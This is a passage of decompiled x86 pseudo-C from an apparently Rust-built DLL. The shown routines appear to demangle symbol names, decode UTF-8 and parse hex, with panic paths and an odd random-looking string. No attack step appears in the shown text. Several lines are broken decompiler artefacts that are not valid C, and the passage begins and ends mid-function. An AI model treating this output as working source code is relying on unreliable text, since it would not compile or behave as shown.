																											_t574 =  *((intOrPtr*)(_a24 + 0xc))(_a20, _v264, _v260);
																											_t1127 = _t1127 + 0xc;
																											__eflags = _t574;
																											_t557 = _v232;
																											_t812 = _v228;
																											if(_t574 != 0) {
																												goto L472;
																											} else {
																												goto L246;
																											}
																										} else {
																											_t820 = _v192;
																											__eflags = _t820 - 0xffffffff;
																											if(__eflags == 0) {
																												goto L489;
																											} else {
																												_t924 = _v260;
																												_t589 = _t820 + 1;
																												__eflags = _t924 - 2;
																												if(_t924 < 2) {
																													L365:
																													__eflags = _t589 - _t924;
																													_v256 = _t820;
																													if(__eflags >= 0) {
																														if(__eflags != 0) {
																															goto L482;
																														} else {
																															_t583 = _t820 + 2;
																															__eflags = _t583;
																															if(_t583 == 0) {
																																_v240 = _t924;
																																_v236 = _v264;
																																goto L408;
																															} else {
																																goto L381;
																															}
																														}
																													} else {
																														_t844 = _v264;
																														__eflags =  *((char*)(_t844 + _t589)) - 0xc0;
																														_t845 = _v256;
																														if( *((char*)(_t844 + _t589)) < 0xc0) {
																															goto L482;
																														} else {
																															_t583 = _t845 + 2;
																															L381:
																															_t1001 = _t924 - _t583;
																															__eflags = _t1001;
																															if(__eflags <= 0) {
																																_t820 = _v264;
																																if(__eflags != 0) {
																																	goto L490;
																																} else {
																																	goto L385;
																																}
																															} else {
																																_t820 = _v264;
																																__eflags =  *((char*)(_t820 + _t583)) - 0xbf;
																																if( *((char*)(_t820 + _t583)) > 0xbf) {
																																	L385:
																																	_t841 = _v256;
																																	_v236 = _t583 + _t820;
																																	__eflags = _t841 - 1;
																																	if(_t841 == 1) {
																																		_t842 =  *_t1055;
																																		_t617 = 0x6ed0f09c;
																																		__eflags = _t842 - 0x43;
																																		if(_t842 == 0x43) {
																																			goto L466;
																																		} else {
																																			__eflags = _t842 - 0x75;
																																			_v240 = _t1001;
																																			if(_t842 == 0x75) {
																																				goto L410;
																																			} else {
																																				goto L245;
																																			}
																																		}
																																	} else {
																																		__eflags = _t841 - 2;
																																		if(_t841 == 2) {
																																			__eflags = ( *_t1055 & 0x0000ffff) - 0x5053;
																																			if(( *_t1055 & 0x0000ffff) == 0x5053) {
																																				_t617 = "@*&<>()C,";
																																				goto L466;
																																			} else {
																																				__eflags = ( *_t1055 & 0x0000ffff) - 0x5042;
																																				if(( *_t1055 & 0x0000ffff) == 0x5042) {
																																					_t617 = "*&<>()C,";
																																					goto L466;
																																				} else {
																																					__eflags = ( *_t1055 & 0x0000ffff) - 0x4652;
																																					if(( *_t1055 & 0x0000ffff) == 0x4652) {
																																						_t617 =  &M6ED0F096;
																																						goto L466;
																																					} else {
																																						__eflags = ( *_t1055 & 0x0000ffff) - 0x544c;
																																						if(( *_t1055 & 0x0000ffff) == 0x544c) {
																																							_t617 = "<>()C,";
																																							goto L466;
																																						} else {
																																							__eflags = ( *_t1055 & 0x0000ffff) - 0x5447;
																																							if(( *_t1055 & 0x0000ffff) == 0x5447) {
																																								_t617 = 0x6ed0f098;
																																								goto L466;
																																							} else {
																																								__eflags = ( *_t1055 & 0x0000ffff) - 0x504c;
																																								if(( *_t1055 & 0x0000ffff) == 0x504c) {
																																									_t617 = 0x6ed0f099;
																																									goto L466;
																																								} else {
																																									__eflags = ( *_t1055 & 0x0000ffff) - 0x5052;
																																									if(( *_t1055 & 0x0000ffff) == 0x5052) {
																																										_t617 = 0x6ed0f09a;
																																										L466:
																																										_t618 =  *((intOrPtr*)(_a24 + 0xc))(_a20, _t617, 1);
																																										_t1127 = _t1127 + 0xc;
																																										__eflags = _t618;
																																										_t603 = _v236;
																																										if(_t618 != 0) {
																																											goto L472;
																																										} else {
																																											goto L467;
																																										}
																																									} else {
																																										_v240 = _t1001;
																																										goto L408;
																																									}
																																								}
																																							}
																																						}
																																					}
																																				}
																																			}
																																		} else {
																																			__eflags = _t841;
																																			_v240 = _t1001;
																																			if(_t841 != 0) {
																																				L408:
																																				__eflags =  *_t1055 - 0x75;
																																				if( *_t1055 != 0x75) {
																																					goto L245;
																																				} else {
																																					_t596 = _v264;
																																					__eflags =  *((char*)(_t596 + 2)) - 0xbf;
																																					if( *((char*)(_t596 + 2)) <= 0xbf) {
																																						_t921 = _v256;
																																						_t815 = _t1055;
																																						_push(0x6ed0f0a0);
																																						goto L477;
																																					}
																																					L410:
																																					_t597 = _v264;
																																					_t929 = _v256;
																																					_t826 = _t597 + 2;
																																					_t1055 = _t929 - 1;
																																					_t930 = _t597 + _t929 + 1;
																																					_t1112 = _t826;
																																					_v248 = _t930;
																																					while(1) {
																																						__eflags = _t1112 - _t930;
																																						if(_t1112 == _t930) {
																																							break;
																																						}
																																						_t764 =  *_t1112 & 0x000000ff;
																																						_t502 =  &_v3; // 0xc0
																																						_t606 = _t502;
																																						_t1003 = _t764 & 0x000000ff;
																																						__eflags = _t764;
																																						if(_t764 < 0) {
																																							__eflags = _t606 - _t930;
																																							if(_t606 == _t930) {
																																								_t607 = 0;
																																								_t1112 = _t930;
																																								_t1004 = _t1003 & 0x0000001f;
																																								__eflags = _t764 - 0xdf;
																																								if(_t764 > 0xdf) {
																																									goto L416;
																																								} else {
																																									goto L421;
																																								}
																																							} else {
																																								_t1112 =  &_v2;
																																								_t607 = _v3 & 0x3f;
																																								_t1004 = _t1003 & 0x0000001f;
																																								__eflags = _t764 - 0xdf;
																																								if(_t764 <= 0xdf) {
																																									L421:
																																									_t998 = _t1004 << 0x00000006 | _t607;
																																									goto L427;
																																								} else {
																																									L416:
																																									__eflags = _t1112 - _t930;
																																									if(_t1112 == _t930) {
																																										_t1112 = _t930;
																																										_t609 = _t607 << 6;
																																										__eflags = _t764 - 0xf0;
																																										if(_t764 >= 0xf0) {
																																											goto L418;
																																										} else {
																																											goto L423;
																																										}
																																									} else {
																																										_t943 =  *_t1112 & 0x000000ff;
																																										_t1112 =  &_v3;
																																										_t609 = _t607 << 0x00000006 | _t943 & 0x0000003f;
																																										__eflags = _t764 - 0xf0;
																																										if(_t764 < 0xf0) {
																																											L423:
																																											_t930 = _v248;
																																											_t998 = _t1004 << 0x0000000c | _t609;
																																											goto L427;
																																										} else {
																																											L418:
																																											_t930 = _v248;
																																											__eflags = _t1112 - _t930;
																																											if(_t1112 == _t930) {
																																												_t765 = 0;
																																												__eflags = 0;
																																												_t1112 = _t930;
																																											} else {
																																												_t766 =  *_t1112 & 0x000000ff;
																																												_t1112 =  &_v3;
																																												_t765 = _t766 & 0x0000003f;
																																											}
																																											_t612 = _t609 << 0x00000006 | (_t1004 & 0x00000007) << 0x00000012 | _t765;
																																											__eflags = _t612 - 0x110000;
																																											_t998 = _t612;
																																											if(_t612 == 0x110000) {
																																												break;
																																											} else {
																																												asm("o16 nop [cs:eax+eax]");
																																												goto L427;
																																											}
																																										}
																																									}
																																								}
																																							}
																																						} else {
																																							_t1112 = _t606;
																																							L427:
																																							_t506 = _t998 - 0x30; // -48
																																							__eflags = _t506 - 0xa;
																																							if(_t506 < 0xa) {
																																								continue;
																																							} else {
																																								_t998 = _t998 + 0xffffff9f;
																																								__eflags = _t998 - 6;
																																								if(_t998 < 6) {
																																									continue;
																																								} else {
																																									_t758 = 1;
																																									_t1113 = _v160;
																																									__eflags = _t1055;
																																									if(_t1055 != 0) {
																																										L432:
																																										_t598 =  *_t826;
																																										__eflags = _t598 - 0x2d;
																																										if(_t598 == 0x2d) {
																																											__eflags = _t1055 - 1;
																																											if(_t1055 == 1) {
																																												goto L245;
																																											} else {
																																												goto L437;
																																											}
																																										} else {
																																											__eflags = _t598 - 0x2b;
																																											if(_t598 != 0x2b) {
																																												L437:
																																												_t599 = 0;
																																												__eflags = 0;
																																												asm("o16 nop [cs:eax+eax]");
																																												while(1) {
																																													__eflags = _t1055;
																																													if(_t1055 == 0) {
																																														break;
																																													}
																																													_t935 =  *_t826 & 0x000000ff;
																																													_t998 = _t935 - 0x30;
																																													__eflags = _t998 - 0xa;
																																													if(_t998 < 0xa) {
																																														L441:
																																														_t604 = _t599 * 0x10;
																																														__eflags = _t604;
																																														if(_t604 < 0) {
																																															goto L245;
																																														} else {
																																															_t826 =  &(_t826[1]);
																																															_t1055 = _t1055 - 1;
																																															_t599 = _t604 + _t998;
																																															__eflags = _t599;
																																															if(_t599 >= 0) {
																																																continue;
																																															} else {
																																																goto L245;
																																															}
																																														}
																																													} else {
																																														_t941 =  <  ? 0xffffffff : (_t935 | 0x00000020) + 0xffffffffffffffa9;
																																														__eflags = _t941 - 0xf;
																																														_t998 = _t941;
																																														if(_t941 > 0xf) {
																																															goto L245;
																																														} else {
																																															goto L441;
																																														}
																																													}
																																													goto L498;
																																												}
																																												__eflags = (_t599 & 0xfffff800) - 0xd800;
																																												_t830 =  ==  ? 0x110000 : _t599;
																																												__eflags = _t599 - 0x110000;
																																												_t831 =  >=  ? 0x110000 :  ==  ? 0x110000 : _t599;
																																												__eflags = _t831 - 0x110000;
																																												_t758 = _t758 | _t599 & 0xffffff00 | _t831 == 0x00110000;
																																												__eflags = _t758;
																																												if(_t758 != 0) {
																																													goto L245;
																																												} else {
																																													__eflags = _t831 - 0x20;
																																													_v224 = _t831;
																																													if(_t831 < 0x20) {
																																														goto L245;
																																													} else {
																																														__eflags = _t831 + 0xffffff81 - 0x20;
																																														if(_t831 + 0xffffff81 <= 0x20) {
																																															goto L245;
																																														} else {
																																															_t602 = E6ECC3490( &_v224,  &_v224, _t1113);
																																															_t1127 = _t1127 + 8;
																																															__eflags = _t602;
																																															_t603 = _v236;
																																															_t998 = _v240;
																																															if(_t602 == 0) {
																																																goto L467;
																																															} else {
																																																goto L472;
																																															}
																																														}
																																													}
																																												}
																																											} else {
																																												_t509 =  &_v256;
																																												 *_t509 = _v256 + 0xfffffffe;
																																												__eflags =  *_t509;
																																												if( *_t509 == 0) {
																																													goto L245;
																																												} else {
																																													_t1055 = _v256;
																																													_t826 = _v264 + 3;
																																													goto L437;
																																												}
																																											}
																																										}
																																									} else {
																																										goto L245;
																																									}
																																								}
																																							}
																																						}
																																						goto L498;
																																					}
																																					_t758 = 0;
																																					_t1113 = _v160;
																																					__eflags = _t1055;
																																					if(_t1055 == 0) {
																																						goto L245;
																																					} else {
																																						goto L432;
																																					}
																																				}
																																			} else {
																																				goto L245;
																																			}
																																		}
																																	}
																																} else {
																																	goto L490;
																																}
																															}
																														}
																													}
																												} else {
																													__eflags =  *_t1055 - 0xc0;
																													if( *_t1055 < 0xc0) {
																														L482:
																														E6ECE9620(_v264, _t924, 1, _t589, 0x6ed0f074);
																														_t1127 = _t1127 + 0xc;
																														asm("ud2");
																														goto L483;
																													} else {
																														goto L365;
																													}
																												}
																											}
																										}
																									} else {
																										__eflags =  *(_t1055 + 1) - 0xbf;
																										if( *(_t1055 + 1) <= 0xbf) {
																											_t821 = _t1055;
																											_t925 = _t998;
																											_push(0x6ed0f064);
																											goto L496;
																										} else {
																											goto L361;
																										}
																									}
																								} else {
																									__eflags = _t580 - 0x2e;
																									if(_t580 != 0x2e) {
																										break;
																									} else {
																										_t428 = _t1055 + 1; // 0x1
																										_t626 = _t428;
																										__eflags = _t998 - 2;
																										if(_t998 < 2) {
																											_t628 =  *((intOrPtr*)(_a24 + 0xc))(_a20, ".assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb", 1);
																											_t1127 = _t1127 + 0xc;
																											_t998 = 0;
																											__eflags = _t628;
																											_t603 = _t626;
																											if(_t628 == 0) {
																												goto L467;
																											} else {
																												goto L472;
																											}
																										} else {
																											_t932 =  *_t626;
																											__eflags = _t932 - 0xbf;
																											if(_t932 <= 0xbf) {
																												goto L491;
																											} else {
																												_t758 = _t626;
																												_t629 = _t932 & 0x000000ff;
																												__eflags = _t932;
																												if(_t932 < 0) {
																													_t1061 = _t1055 + _t998;
																													_t833 = 0;
																													_v260 = _t998;
																													__eflags = _t998 - 2;
																													_t1010 = _t1061;
																													if(_t998 != 2) {
																														_t487 = _v264 + 3; // 0x3
																														_t1010 = _t487;
																														_t833 =  *(_v264 + 2) & 0x3f;
																														__eflags = _t833;
																													}
																													_t630 = _t629 & 0x0000001f;
																													__eflags = _t932 - 0xdf;
																													if(_t932 <= 0xdf) {
																														_t631 = _t630 << 6;
																														goto L455;
																													} else {
																														__eflags = _t1010 - _t1061;
																														if(_t1010 == _t1061) {
																															_v256 = 0;
																															_t1011 = _t1061;
																															_t833 = (_t833 << 6) + _v256;
																															__eflags = _t932 - 0xf0;
																															if(_t932 >= 0xf0) {
																																goto L405;
																															} else {
																																goto L454;
																															}
																														} else {
																															_v248 = _t1061;
																															_t1011 =  &(_t1010[1]);
																															_v256 =  *_t1010 & 0x3f;
																															_t1061 = _v248;
																															_t833 = (_t833 << 6) + _v256;
																															__eflags = _t932 - 0xf0;
																															if(_t932 < 0xf0) {
																																L454:
																																_t631 = _t630 << 0xc;
																																__eflags = _t631;
																																L455:
																																_t1055 = _v264;
																																_t1001 = _v260;
																																__eflags = (_t631 | _t833) - 0x2e;
																																if((_t631 | _t833) == 0x2e) {
																																	goto L333;
																																} else {
																																	goto L456;
																																}
																															} else {
																																L405:
																																__eflags = _t1011 - _t1061;
																																if(_t1011 == _t1061) {
																																	_t933 = 0;
																																	__eflags = 0;
																																} else {
																																	_t933 =  *_t1011 & 0x3f;
																																}
																																_t1055 = _v264;
																																_t1001 = _v260;
																																__eflags = (_t833 << 0x00000006 | (_t630 & 0x00000007) << 0x00000012 | _t933) - 0x2e;
																																if((_t833 << 0x00000006 | (_t630 & 0x00000007) << 0x00000012 | _t933) == 0x2e) {
																																	goto L333;
																																} else {
																																	goto L456;
																																}
																															}
																														}
																													}
																												} else {
																													__eflags = _t629 - 0x2e;
																													if(_t629 != 0x2e) {
																														L456:
																														_t636 =  *((intOrPtr*)(_a24 + 0xc))(_a20, ".assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb", 1);
																														_t1127 = _t1127 + 0xc;
																														__eflags = _t636;
																														if(_t636 != 0) {
																															goto L472;
																														} else {
																															__eflags =  *_t758 - 0xbf;
																															if( *_t758 <= 0xbf) {
																																_t821 = _t1055;
																																_t925 = _t1001;
																																_push(0x6ed0f044);
																																goto L496;
																															} else {
																																_t998 = _t1001 - 1;
																																_t1055 = _t758;
																																continue;
																															}
																														}
																													} else {
																														L333:
																														_t634 =  *((intOrPtr*)(_a24 + 0xc))(_a20, 0x6ed0f020, 2);
																														_t1127 = _t1127 + 0xc;
																														__eflags = _t634;
																														if(_t634 != 0) {
																															goto L472;
																														} else {
																															_t432 = _t1055 + 2; // 0x2
																															_t603 = _t432;
																															__eflags = _t1001 - 3;
																															if(_t1001 < 3) {
																																L336:
																																_t998 = _t1001 + 0xfffffffe;
																																L467:
																																_t1055 = _t603;
																																continue;
																															} else {
																																__eflags =  *_t603 - 0xbf;
																																if( *_t603 <= 0xbf) {
																																	goto L497;
																																} else {
																																	goto L336;
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L498;
																							}
																							_t758 = _t1055 + _t998;
																							_t572 = 0;
																							__eflags = 0;
																							_t817 = _t1055;
																							_v260 = _t998;
																							_v256 = _t758;
																							while(1) {
																								__eflags = _t817 - _t758;
																								if(_t817 == _t758) {
																									goto L245;
																								}
																								_t1055 = _t572;
																								_t575 =  *_t817 & 0x000000ff;
																								_t436 = _t817 + 1; // 0x1
																								_t998 = _t436;
																								_t923 = _t575 & 0x000000ff;
																								__eflags = _t575;
																								if(_t575 >= 0) {
																									L353:
																									__eflags = _t923 - 0x24;
																									if(_t923 == 0x24) {
																										L355:
																										__eflags = _t1055;
																										if(_t1055 == 0) {
																											_t577 =  *((intOrPtr*)(_a24 + 0xc))(_a20, _v264, 0);
																											_t1127 = _t1127 + 0xc;
																											_t1001 = _v260;
																											_t818 = 0;
																											__eflags = _t577;
																											if(_t577 == 0) {
																												goto L376;
																											} else {
																												goto L472;
																											}
																										} else {
																											_t1001 = _v260;
																											__eflags = _t1001 - _t1055;
																											if(__eflags <= 0) {
																												_t825 = _v264;
																												if(__eflags != 0) {
																													goto L485;
																												} else {
																													goto L371;
																												}
																											} else {
																												_t825 = _v264;
																												__eflags =  *((char*)(_t825 + _t1055)) - 0xbf;
																												if( *((char*)(_t825 + _t1055)) > 0xbf) {
																													L371:
																													_t642 =  *((intOrPtr*)(_a24 + 0xc))(_a20, _t825, _t1055);
																													_t1127 = _t1127 + 0xc;
																													__eflags = _t642;
																													if(_t642 != 0) {
																														goto L472;
																													} else {
																														__eflags = _t1001 - _t1055;
																														if(__eflags <= 0) {
																															_t818 = _t1001;
																															if(__eflags != 0) {
																																goto L487;
																															} else {
																																goto L376;
																															}
																														} else {
																															_t643 = _v264;
																															__eflags =  *((char*)(_t643 + _t1055)) - 0xbf;
																															if( *((char*)(_t643 + _t1055)) <= 0xbf) {
																																goto L487;
																															} else {
																																_t818 = _t1055;
																																L376:
																																_t998 = _t1001 - _t818;
																																_t1055 = _v264 + _t818;
																																goto L326;
																															}
																														}
																													}
																												} else {
																													goto L485;
																												}
																											}
																										}
																									} else {
																										_t645 = _t1055 - _t817;
																										_t817 = _t998;
																										_t572 = _t645 + _t998;
																										__eflags = _t923 - 0x2e;
																										if(_t923 != 0x2e) {
																											continue;
																										} else {
																											goto L355;
																										}
																									}
																								} else {
																									__eflags = _t998 - _t758;
																									if(_t998 == _t758) {
																										_t998 = _t758;
																										_t767 = 0;
																										_t945 = _t923 & 0x0000001f;
																										__eflags = _t575 - 0xdf;
																										if(_t575 > 0xdf) {
																											goto L342;
																										} else {
																											goto L347;
																										}
																									} else {
																										_t438 = _t817 + 2; // 0x2
																										_t998 = _t438;
																										_t767 =  *(_t817 + 1) & 0x3f;
																										_t945 = _t923 & 0x0000001f;
																										__eflags = _t575 - 0xdf;
																										if(_t575 <= 0xdf) {
																											L347:
																											_t923 = _t945 << 0x00000006 | _t767;
																											_t758 = _v256;
																											goto L353;
																										} else {
																											L342:
																											_t1114 = _v256;
																											__eflags = _t998 - _t1114;
																											if(_t998 == _t1114) {
																												_t998 = _t1114;
																												_t769 = _t767 << 6;
																												__eflags = _t575 - 0xf0;
																												if(_t575 >= 0xf0) {
																													goto L344;
																												} else {
																													goto L349;
																												}
																											} else {
																												_t1119 =  *_t998 & 0x000000ff;
																												_t998 = _t998 + 1;
																												_t769 = _t767 << 0x00000006 | _t1119 & 0x0000003f;
																												__eflags = _t575 - 0xf0;
																												if(_t575 < 0xf0) {
																													L349:
																													_t923 = _t945 << 0x0000000c | _t769;
																													_t758 = _v256;
																													goto L353;
																												} else {
																													L344:
																													_t1116 = _v256;
																													__eflags = _t998 - _t1116;
																													if(_t998 == _t1116) {
																														_t646 = 0;
																														__eflags = 0;
																														_t998 = _t1116;
																													} else {
																														_t647 =  *_t998 & 0x000000ff;
																														_t998 = _t998 + 1;
																														_t646 = _t647 & 0x0000003f;
																													}
																													_t772 = _t769 << 0x00000006 | (_t945 & 0x00000007) << 0x00000012 | _t646;
																													__eflags = _t772 - 0x110000;
																													_t923 = _t772;
																													_t758 = _v256;
																													if(_t772 == 0x110000) {
																														goto L245;
																													} else {
																														asm("o16 nop [cs:eax+eax]");
																														goto L353;
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L498;
																							}
																							goto L245;
																						}
																					} else {
																						goto L324;
																					}
																				}
																			} else {
																				_t846 = _v160;
																				_t651 =  *((intOrPtr*)( *((intOrPtr*)(_t846 + 0x1c)) + 0xc))( *((intOrPtr*)(_t846 + 0x18)), 0x6ed0f020, 2);
																				_t1127 = _t1127 + 0xc;
																				__eflags = _t651;
																				if(_t651 != 0) {
																					L472:
																					_t558 = 1;
																					goto L471;
																				} else {
																					goto L322;
																				}
																			}
																		} else {
																			L294:
																			__eflags = _v228 - _v232;
																			if(_v228 != _v232) {
																				goto L320;
																			} else {
																				__eflags = _t1059;
																				if(_t1059 == 0) {
																					goto L320;
																				} else {
																					__eflags = _v256 - 0x68;
																					if(_v256 != 0x68) {
																						goto L320;
																					} else {
																						__eflags = _t1059 - 2;
																						if(_t1059 < 2) {
																							goto L470;
																						} else {
																							_t950 =  *_t1103;
																							_t652 = _t1103;
																							__eflags = _t950 - 0xc0;
																							if(_t950 < 0xc0) {
																								L483:
																								_t825 = _v264;
																								_t927 = _t1055;
																								_push(0x6ed0efb0);
																								L484:
																								_push(_t1055);
																								_push(1);
																								E6ECE9620(_t825, _t927);
																								_t1127 = _t1127 + 0xc;
																								asm("ud2");
																								L485:
																								_t928 = _t1001;
																								_push(0x6ed0f0b0);
																								goto L486;
																							} else {
																								_t1001 = _t652 + 1;
																								__eflags = _t950;
																								if(_t950 < 0) {
																									L301:
																									_t775 = _v252;
																									_t952 = _t950 & 0x0000001f;
																									__eflags = _t1001 - _t775;
																									if(_t1001 == _t775) {
																										_t847 = 0;
																										_t653 = _t775;
																										_t776 = _t952 & 0x000000ff;
																										__eflags = _t952 - 0xdf;
																										if(_t952 > 0xdf) {
																											goto L303;
																										} else {
																											goto L308;
																										}
																									} else {
																										_t853 = _t654[1] & 0x000000ff;
																										_t654 =  &(_t654[2]);
																										_t847 = _t853 & 0x0000003f;
																										_t776 = _t952 & 0x000000ff;
																										__eflags = _t952 - 0xdf;
																										if(_t952 <= 0xdf) {
																											L308:
																											_t779 = _t776 << 6;
																											goto L311;
																										} else {
																											L303:
																											_t1012 = _v252;
																											__eflags = _t653 - _t1012;
																											if(_t653 == _t1012) {
																												_t654 = _t1012;
																												_t1001 = 0;
																												_t849 = _t847 << 6;
																												__eflags = _t952 - 0xf0;
																												if(_t952 >= 0xf0) {
																													goto L305;
																												} else {
																													goto L310;
																												}
																											} else {
																												_t654 =  &(_t653[1]);
																												_t1001 =  *_t653 & 0x3f;
																												_t847 = _t847 << 0x00000006 | _t1001;
																												__eflags = _t952 - 0xf0;
																												if(_t952 < 0xf0) {
																													L310:
																													_t779 = _t776 << 0xc;
																													__eflags = _t779;
																													L311:
																													_t852 = _t847 | _t779;
																													_t762 = _v260;
																													goto L315;
																												} else {
																													L305:
																													_t1001 = _v252;
																													__eflags = _t654 - _t1001;
																													if(_t654 == _t1001) {
																														_t953 = 0;
																														__eflags = 0;
																														_t654 = _t1001;
																													} else {
																														_t956 =  *_t654 & 0x000000ff;
																														_t654 =  &(_t654[1]);
																														_t953 = _t956 & 0x0000003f;
																													}
																													_t762 = _v260;
																													_t852 = _t849 << 0x00000006 | (_t776 & 0x00000007) << 0x00000012 | _t953;
																													__eflags = _t852 - 0x110000;
																													if(_t852 == 0x110000) {
																														goto L470;
																													} else {
																														asm("o16 nop [cs:eax+eax]");
																														goto L315;
																													}
																												}
																											}
																										}
																									}
																								} else {
																									L300:
																									_t852 = _t950 & 0x000000ff;
																									_t654 = _t1001;
																									L315:
																									_t418 = _t852 - 0x30; // -48
																									__eflags = _t418 - 0xa;
																									if(_t418 < 0xa) {
																										L317:
																										__eflags = _t654 - _v252;
																										if(_t654 == _v252) {
																											goto L470;
																										} else {
																											_t950 =  *_t654;
																											_t1001 =  &(_t654[1]);
																											__eflags = _t950;
																											if(_t950 >= 0) {
																												goto L300;
																											} else {
																												goto L301;
																											}
																										}
																									} else {
																										_t858 =  <  ? 0xffffffff : (_t852 | 0x00000020) + 0xffffffffffffffa9;
																										__eflags = ( <  ? 0xffffffff : (_t852 | 0x00000020) + 0xffffffffffffffa9) - 0xf;
																										if(( <  ? 0xffffffff : (_t852 | 0x00000020) + 0xffffffffffffffa9) > 0xf) {
																											goto L320;
																										} else {
																											goto L317;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	} else {
																		L481:
																		_t928 = _t758;
																		_push(0x6ed0f010);
																		L486:
																		_push(_t1055);
																		_push(0);
																		E6ECE9620(_t825, _t928);
																		_t1127 = _t1127 + 0xc;
																		asm("ud2");
																		L487:
																		_t820 = _v264;
																		_t924 = _t1001;
																		_push(0x6ed0f0c0);
																		_push(_t1001);
																		L488:
																		_push(_t1055);
																		E6ECE9620(_t820, _t924);
																		_t1127 = _t1127 + 0xc;
																		asm("ud2");
																		L489:
																		_t583 = E6ECE9980(_t758, _t1001, _t1055, __eflags);
																		asm("ud2");
																		L490:
																		E6ECE9620(_t820, _t924, _t583, _t924, 0x6ed0f084);
																		_t1127 = _t1127 + 0xc;
																		asm("ud2");
																		L491:
																		_t821 = _t1055;
																		_t925 = _t1001;
																		_push(0x6ed0f034);
																		L496:
																		_push(_t1001);
																		_push(1);
																		E6ECE9620(_t821, _t925);
																		asm("ud2");
																		L497:
																		E6ECE9620(_t1055, _t1001, 2, _t1001, 0x6ed0f054);
																		asm("ud2");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_t587 = _v256;
																		return  *((intOrPtr*)( *((intOrPtr*)(_t587 + 0x1c)) + 0xc))( *((intOrPtr*)(_t587 + 0x18)), "SizeLimitExhausted", 0x12);
																	}
																}
															}
														}
														goto L498;
													}
												}
												L470:
												_t558 = 0;
												__eflags = 0;
												goto L471;
											} else {
												_v224 = 0;
												_v220 =  *((intOrPtr*)(_t556 + 4));
												_v216 =  *((intOrPtr*)(_t556 + 8));
												_v212 = 0;
												_v208 = 0;
												_v204 = _t918;
												_v200 = 0;
												_t558 = E6ECC4AE0( &_v224);
												L471:
												return _t558;
											}
										} else {
											_t58 = _t910 + 1; // 0x1
											_t755 = _t58;
											_t758 =  *(_v160 + _t910) & 0x000000ff;
											_t1142 = _t758 -  *((intOrPtr*)(_t998 + _t910));
											_t910 = _t755;
											if(_t1142 == 0) {
												continue;
											} else {
												_t989 = _v156;
												_v164 = 0;
												_t998 = _t995 + _v124 + _t755;
												goto L9;
											}
										}
										goto L498;
									}
									_t998 = _t995;
									_t911 = _v136;
									_t996 = _v156;
									asm("o16 nop [eax+eax]");
									while(1) {
										__eflags = _v164 - _t911;
										if(_v164 >= _t911) {
											break;
										}
										_t902 = _t911 - 1;
										__eflags = _t902 - _v144;
										if(__eflags >= 0) {
											L234:
											_t916 = _v144;
											_push(0x6ed0f700);
											goto L235;
										} else {
											_t758 = _t902 + _t998;
											_t1055 = _t996;
											__eflags = _t758 - _t996;
											if(__eflags >= 0) {
												_t902 = _t758;
												_t916 = _t1055;
												_push(0x6ed0f710);
												goto L235;
											} else {
												_t751 = _v160;
												_t997 = _v148;
												__eflags = ( *(_t751 + _t902) & 0x000000ff) -  *((intOrPtr*)(_t997 + _t758));
												_t996 = _t1055;
												if(( *(_t751 + _t902) & 0x000000ff) ==  *((intOrPtr*)(_t997 + _t758))) {
													continue;
												} else {
													_t998 = _t998 + _v132;
													_v164 = _v128;
													goto L9;
												}
											}
										}
										goto L498;
									}
									L39:
									_t809 = _v152;
									_t1055 = _t998 + 6;
									__eflags = _t1055;
									if(_t1055 == 0) {
										L44:
										__eflags = _t1055 - _a4;
										if(_t1055 != _a4) {
											_t983 = _v152;
											_v140 = _t998;
											_t895 = _t983 + _a4;
											_t1087 = _t1055 + _t983;
											do {
												_t758 =  *_t1087 & 0x000000ff;
												_t704 = _t1087 + 1;
												_t984 = _t758 & 0x000000ff;
												__eflags = _t758;
												if(_t758 < 0) {
													__eflags = _t704 - _t895;
													if(_t704 == _t895) {
														_t1042 = 0;
														_t1055 = _t895;
														_t985 = _t984 & 0x0000001f;
														__eflags = _t758 - 0xdf;
														if(_t758 > 0xdf) {
															goto L55;
														} else {
															goto L60;
														}
													} else {
														_t1048 =  *(_t1087 + 1) & 0x000000ff;
														_t1087 = _t1087 + 2;
														_t1042 = _t1048 & 0x0000003f;
														_t985 = _t984 & 0x0000001f;
														__eflags = _t758 - 0xdf;
														if(_t758 <= 0xdf) {
															L60:
															_t988 = _t985 << 6;
															goto L63;
														} else {
															L55:
															__eflags = _t1055 - _t895;
															if(_t1055 == _t895) {
																_t1055 = _t895;
																_t1044 = _t1042 << 6;
																__eflags = _t758 - 0xf0;
																if(_t758 >= 0xf0) {
																	goto L57;
																} else {
																	goto L62;
																}
															} else {
																_t1087 = _t1055 + 1;
																_t1042 = _t1042 << 0x00000006 |  *_t1055 & 0x3f;
																__eflags = _t758 - 0xf0;
																if(_t758 < 0xf0) {
																	L62:
																	_t988 = _t985 << 0xc;
																	__eflags = _t988;
																	L63:
																	_t984 = _t988 | _t1042;
																	_t998 = _v140;
																	goto L67;
																} else {
																	L57:
																	__eflags = _t1055 - _t895;
																	if(_t1055 == _t895) {
																		_t706 = 0;
																		__eflags = 0;
																		_t1087 = _t895;
																	} else {
																		_t1087 = _t1055 + 1;
																		_t706 =  *_t1055 & 0x3f;
																	}
																	_t1047 = _t1044 << 0x00000006 | (_t985 & 0x00000007) << 0x00000012 | _t706;
																	__eflags = _t1047 - 0x110000;
																	_t984 = _t1047;
																	_t998 = _v140;
																	if(_t1047 == 0x110000) {
																		goto L45;
																	} else {
																		asm("o16 nop [cs:eax+eax]");
																		goto L67;
																	}
																}
															}
														}
													}
												} else {
													_t1087 = _t704;
													L67:
													_t152 = _t984 - 0x41; // -65
													__eflags = _t152 - 6;
													if(_t152 < 6) {
														goto L50;
													} else {
														__eflags = _t984 - 0x30;
														if(_t984 < 0x30) {
															goto L71;
														} else {
															__eflags = _t984 - 0x3a;
															if(_t984 < 0x3a) {
																goto L50;
															} else {
																__eflags = _t984 - 0x40;
																if(_t984 == 0x40) {
																	goto L50;
																} else {
																	goto L71;
																}
															}
														}
													}
